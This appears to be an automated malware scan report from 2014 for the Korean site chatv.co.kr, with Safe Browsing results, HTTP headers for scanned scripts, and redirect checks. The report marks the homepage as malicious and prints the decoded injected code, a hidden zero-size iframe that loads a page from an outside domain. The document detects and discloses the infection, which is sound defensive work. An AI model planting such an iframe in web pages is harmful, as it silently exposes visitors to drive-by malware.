Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chatv.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chatv.co.kr/ | 200 OK Content-Length: 48321 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function changeImage(tabNum,Num){ for (i=1; i< 7; i++) { if(i != tabNum) { document.getElementById("main_tab0"+i).src = "/image/main_tab0"+i+".gif"; document.getElementById("tab"+i).style.display="none"; } else { document.getElementById("main_tab0"+tabNum).src = "/image/main_tab0"+tabNum+"r.gif"; ...[2409 bytes skipped]... Decoded script: <iframe src=http://songhwasu.com/my/by4.html width=0 height=0></iframe> Antivirus reports:
| ||
http://chatv.co.kr/Script/flash.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:34 GMT Accept-Ranges: bytes ETag: "a654866d60a0c81:d22" Server: Microsoft-IIS/6.0 Content-Length: 656 Content-Location: http://chatv.co.kr/Script/flash.js Content-Type: application/x-javascript Last-Modified: Thu, 17 Apr 2008 07:55:39 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/script/flash.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:35 GMT Accept-Ranges: bytes ETag: "a654866d60a0c81:d22" Server: Microsoft-IIS/6.0 Content-Length: 656 Content-Location: http://chatv.co.kr/script/flash.js Content-Type: application/x-javascript Last-Modified: Thu, 17 Apr 2008 07:55:39 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/test404page.js | 404 Not Found Content-Length: 92 Content-Type: text/html | clean |
http://chatv.co.kr/Script/common.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:37 GMT Accept-Ranges: bytes ETag: "804867163c43cf1:d22" Server: Microsoft-IIS/6.0 Content-Length: 4567 Content-Location: http://chatv.co.kr/Script/common.js Content-Type: application/x-javascript Last-Modified: Wed, 19 Mar 2014 06:25:57 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/script/common.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:38 GMT Accept-Ranges: bytes ETag: "804867163c43cf1:d22" Server: Microsoft-IIS/6.0 Content-Length: 4567 Content-Location: http://chatv.co.kr/script/common.js Content-Type: application/x-javascript Last-Modified: Wed, 19 Mar 2014 06:25:57 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/Script/cafe.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:39 GMT Accept-Ranges: bytes ETag: "986c478b774ca1:d22" Server: Microsoft-IIS/6.0 Content-Length: 3550 Content-Location: http://chatv.co.kr/Script/cafe.js Content-Type: application/x-javascript Last-Modified: Thu, 03 Dec 2009 10:58:28 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/script/cafe.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:40 GMT Accept-Ranges: bytes ETag: "986c478b774ca1:d22" Server: Microsoft-IIS/6.0 Content-Length: 3550 Content-Location: http://chatv.co.kr/script/cafe.js Content-Type: application/x-javascript Last-Modified: Thu, 03 Dec 2009 10:58:28 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/Script/allinfoForLec.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:40 GMT Accept-Ranges: bytes ETag: "2fa9f9fd68ca1:d22" Server: Microsoft-IIS/6.0 Content-Length: 24242 Content-Location: http://chatv.co.kr/Script/allinfoForLec.js Content-Type: application/x-javascript Last-Modified: Thu, 19 Nov 2009 09:52:15 GMT X-Powered-By: ASP.NET | clean |
http://chatv.co.kr/script/allinfoforlec.js | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 21:19:43 GMT Accept-Ranges: bytes ETag: "2fa9f9fd68ca1:d22" Server: Microsoft-IIS/6.0 Content-Length: 24242 Content-Location: http://chatv.co.kr/script/allinfoforlec.js Content-Type: application/x-javascript Last-Modified: Thu, 19 Nov 2009 09:52:15 GMT X-Powered-By: ASP.NET | clean |
http://rsense-ad.realclick.co.kr/rsense/rsense_ad.js?rid=49165238366 | 200 OK Content-Length: 2906 Content-Type: text/html | clean |
http://log.inside.daum.net/dwi_log/js/dwi.js | 500 Can't connect to log.inside.daum.net:80 (Bad hostname) Content-Length: 170 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chatv.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 20 Jul 2014 21:19:31 GMT
Server: Microsoft-IIS/6.0
Content-Length: 48321
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCRBDCRS=IICAKCPBCKJCGLKCCCBCOFHJ; path=/
X-Powered-By: ASP.NET
...48321 bytes of data.
GET / HTTP/1.1
Host: chatv.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 20 Jul 2014 21:19:31 GMT
Server: Microsoft-IIS/6.0
Content-Length: 48321
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCRBDCRS=IICAKCPBCKJCGLKCCCBCOFHJ; path=/
X-Powered-By: ASP.NET
...48321 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chatv.co.kr
Referer: http://www.google.com/search?q=chatv.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chatv.co.kr
Referer: http://www.google.com/search?q=chatv.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.